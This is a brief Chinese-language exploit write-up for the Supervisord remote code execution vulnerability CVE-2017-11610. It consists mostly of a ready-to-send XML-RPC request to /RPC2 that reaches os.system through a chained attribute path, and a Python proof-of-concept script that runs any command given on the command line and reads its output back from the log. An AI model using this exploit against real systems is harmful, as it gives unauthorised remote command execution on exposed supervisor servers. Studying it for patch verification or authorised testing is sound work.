Supervisord 远程代码执行漏洞(CVE-2017-11610)

访问目标站点supervisor,默认端口9001

发送的数据包内容,将Host值改为目标站点IP地址

POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 275

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/hello</string>
</param>
</params>
</methodCall>

发送,返回200 OK创建hello成功

Poc.py

#!/usr/bin/env python3
import xmlrpc.client
import sys

target = sys.argv[1]
command = sys.argv[2]
proxy = xmlrpc.client.ServerProxy(target)
old = getattr(proxy, 'supervisor.readLog')(0,0)
logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))
result = getattr(proxy, 'supervisor.readLog')(0,0)
print(result[len(old):])

运行poc.py代码,访问RPC2,后边跟需要执行的命令

参考资料:

https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html

您可能还喜欢...